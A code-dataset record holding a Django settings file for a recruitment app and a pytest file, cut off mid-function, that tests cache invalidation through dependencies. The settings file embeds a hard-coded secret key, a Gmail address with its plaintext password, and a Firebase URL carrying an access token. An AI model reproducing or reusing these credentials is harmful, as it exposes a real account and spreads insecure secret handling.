hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1f9e2b33b207fef7c3b5a644492509e3963249a3 | 11,404 | py | Python | AIP/settings.py | priyamshah112/AIP | 7bcc01e169f045ef19730fbcf07f6ca785e3032b | [
"MIT"
] | 1 | 2021-12-13T17:49:34.000Z | 2021-12-13T17:49:34.000Z | AIP/settings.py | priyamshah112/AIP | 7bcc01e169f045ef19730fbcf07f6ca785e3032b | [
"MIT"
] | null | null | null | AIP/settings.py | priyamshah112/AIP | 7bcc01e169f045ef19730fbcf07f6ca785e3032b | [
"MIT"
] | null | null | null | """
Django settings for AIP project.
Generated by 'django-admin startproject' using Django 2.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '!#vi4z5lfu9bsgl@a16^=e9_(x^8h&or6l$hy6b!n-b1ln3!43'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'accounts',
'recruiter',
'candidate',
'maintainer'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'AIP.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'AIP.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static'),
]
#For mailing purposes
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_USE_TLS = True
EMAIL_USE_SSL = False
EMAIL_PORT = 587
EMAIL_HOST_USER = 'mum.amptech@gmail.com'
EMAIL_HOST_PASSWORD = 'amp@2019'
OPERATIONS_EMAIL = 'mum.amptech@gmail.com'
MAX_FILE_SIZE_MB = 5
MAX_FILE_COUNT = 5
"""
To upload any files in media you can use the format:
>>> path = '<sub_directory_in_media>/<filename>'
for example:
>>> file_name = file_system.save('temp/' + file.name, file)
"""
MEDIA_URL = 'media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
DEFAULT_CAND_PICTURE = 'data:img/jpeg;base64,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'
DEFAULT_THANK_VID = 'https://firebasestorage.googleapis.com/v0/b/aplidotai-intern.appspot.com/o/resumeVideos%2Fmanthanchauhan913%40gmail.com?alt=media&token=1b70406d-65d0-46a6-b7c3-4e9a991b752d' | 74.535948 | 7,466 | 0.879867 | 671 | 11,404 | 14.862891 | 0.605067 | 0.019553 | 0.015442 | 0.017547 | 0.052442 | 0.042415 | 0.026772 | 0.026772 | 0.012032 | 0 | 0 | 0.113379 | 0.054893 | 11,404 | 153 | 7,467 | 74.535948 | 0.811932 | 0.087952 | 0 | 0 | 1 | 0.023529 | 0.873762 | 0.831976 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0.070588 | 0.011765 | 0 | 0.011765 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
1f1d840cf8f776c0ae523cefb11cf9db3ebc2d05 | 9,458 | py | Python | tests/test_dependencies.py | akuhnregnier/wildfires | 4d31cbdd4a1303ecebc391a35c73b8f07d8fe400 | [
"MIT"
] | 1 | 2021-01-30T15:38:32.000Z | 2021-01-30T15:38:32.000Z | tests/test_dependencies.py | akuhnregnier/wildfires | 4d31cbdd4a1303ecebc391a35c73b8f07d8fe400 | [
"MIT"
] | null | null | null | tests/test_dependencies.py | akuhnregnier/wildfires | 4d31cbdd4a1303ecebc391a35c73b8f07d8fe400 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import pytest
from wildfires.cache import mark_dependency
from wildfires.exceptions import NotCachedError
from .utils import * # noqa
@pytest.mark.parametrize("memory", ["cloudpickle", "proxy"], indirect=True)
def test_dependencies(memory):
"""Test that when dependencies change, the cache gets invalidated."""
@memory.cache
@mark_dependency
def f(x):
return x + 1
@memory.cache(dependencies=(f,))
def f2(x):
return f(x) + 10
assert f(1) == 2
assert f2(1) == 12
# Defining the same functions as above should not invalidate the previous cache
# entries.
@memory.cache
@mark_dependency
def f(x):
return x + 1
@memory.cache(dependencies=(f,))
def f2(x):
return f(x) + 10
assert f.check_in_store(1)
assert f2.check_in_store(1)
# However, redefining `f` should invalidate both cache entries.
@memory.cache
@mark_dependency
def f(x):
return x + 2
@memory.cache(dependencies=(f,))
def f2(x):
return f(x) + 10
with pytest.raises(NotCachedError):
f.check_in_store(1)
with pytest.raises(NotCachedError):
f2.check_in_store(1)
assert f(1) == 3
assert f2(1) == 13
@pytest.mark.parametrize("memory", ["cloudpickle", "proxy"], indirect=True)
def test_dependencies_2(memory):
"""Test that when dependencies change, the cache gets invalidated.
This should work even if the cached function is marked as a possible dependency
itself.
"""
@memory.cache
@mark_dependency
def f(x):
return x + 1
@memory.cache(dependencies=(f,))
@mark_dependency
def f2(x):
return f(x) + 10
assert f(1) == 2
assert f2(1) == 12
# Defining the same functions as above should not invalidate the previous cache
# entries.
@memory.cache
@mark_dependency
def f(x):
return x + 1
@memory.cache(dependencies=(f,))
@mark_dependency
def f2(x):
return f(x) + 10
assert f.check_in_store(1)
assert f2.check_in_store(1)
# However, redefining `f` should invalidate both cache entries.
@memory.cache
@mark_dependency
def f(x):
return x + 2
@memory.cache(dependencies=(f,))
@mark_dependency
def f2(x):
return f(x) + 10
with pytest.raises(NotCachedError):
f.check_in_store(1)
with pytest.raises(NotCachedError):
f2.check_in_store(1)
assert f(1) == 3
assert f2(1) == 13
@pytest.mark.parametrize("memory", ["cloudpickle", "proxy"], indirect=True)
def test_dependencies_default_args(memory):
"""Test cache is invalidated when default arguments of dependencies change."""
@memory.cache
@mark_dependency
def f(x=0):
return x + 1
@memory.cache(dependencies=(f,))
@mark_dependency
def f2(x):
return f(x) + 10
assert f(1) == 2
assert f2(1) == 12
# Defining the same functions as above should not invalidate the previous cache
# entries.
@memory.cache
@mark_dependency
def f(x=0):
return x + 1
@memory.cache(dependencies=(f,))
@mark_dependency
def f2(x):
return f(x) + 10
assert f.check_in_store(1)
assert f2.check_in_store(1)
# However, redefining `f` should invalidate both cache entries.
@memory.cache
@mark_dependency
def f(x=1):
return x + 1
@memory.cache(dependencies=(f,))
@mark_dependency
def f2(x):
return f(x) + 10
assert f.check_in_store(1)
with pytest.raises(NotCachedError):
f2.check_in_store(1)
assert f(1) == 2
assert f2(1) == 12
@pytest.mark.parametrize("memory", ["cloudpickle", "proxy"], indirect=True)
def test_chained_dependencies(memory):
"""Test cache is invalidated when chained dependencies change."""
@memory.cache
@mark_dependency
def f(x=0):
return x + 1
@memory.cache(dependencies=(f,))
@mark_dependency
def f1(x=0):
return f(x) - 10
@memory.cache(dependencies=(f1,))
@mark_dependency
def f2(x):
return f1(x) + 100
assert f(1) == 2
assert f1(1) == -8
assert f2(1) == 92
# Defining the same functions as above should not invalidate the previous cache
# entries.
@memory.cache
@mark_dependency
def f(x=0):
return x + 1
@memory.cache(dependencies=(f,))
@mark_dependency
def f1(x=0):
return f(x) - 10
@memory.cache(dependencies=(f1,))
@mark_dependency
def f2(x):
return f1(x) + 100
for func in (f, f1, f2):
assert func.check_in_store(1)
# However, redefining `f` should invalidate all cache entries.
@memory.cache
@mark_dependency
def f(x=0):
return x + 2
@memory.cache(dependencies=(f,))
@mark_dependency
def f1(x=0):
return f(x) - 10
@memory.cache(dependencies=(f1,))
@mark_dependency
def f2(x):
return f1(x) + 100
for func in (f, f1, f2):
with pytest.raises(NotCachedError):
func.check_in_store(1)
assert f(1) == 3
assert f1(1) == -7
assert f2(1) == 93
@pytest.mark.parametrize("memory", ["cloudpickle", "proxy"], indirect=True)
@pytest.mark.parametrize("redefine", ["f", "f0", "f+f0"])
def test_multiple_chained_dependencies(memory, redefine):
"""Test cache is invalidated when chained dependencies change."""
@memory.cache
@mark_dependency
def f(x=0):
return x + 1
@memory.cache
@mark_dependency
def f0(x=0):
return x + 3
@memory.cache(dependencies=(f, f0))
@mark_dependency
def f1(x=0):
return f(x) + f0(x) - 10
@memory.cache(dependencies=(f1,))
@mark_dependency
def f2(x):
return f1(x) + 100
assert f(1) == 2
assert f0(1) == 4
assert f1(1) == -4
assert f2(1) == 96
# Defining the same functions as above should not invalidate the previous cache
# entries.
@memory.cache
@mark_dependency
def f(x=0):
return x + 1
@memory.cache
@mark_dependency
def f0(x=0):
return x + 3
@memory.cache(dependencies=(f, f0))
@mark_dependency
def f1(x=0):
return f(x) + f0(x) - 10
@memory.cache(dependencies=(f1,))
@mark_dependency
def f2(x):
return f1(x) + 100
for func in (f, f0, f1, f2):
assert func.check_in_store(1)
# However, redefining either `f` or `f0` should invalidate all cache entries.
if redefine == "f":
@memory.cache
@mark_dependency
def f(x=0):
return x + 2
elif redefine == "f0":
@memory.cache
@mark_dependency
def f0(x=0):
return x + 2
elif redefine == "f+f0":
@memory.cache
@mark_dependency
def f(x=0):
return x + 2
@memory.cache
@mark_dependency
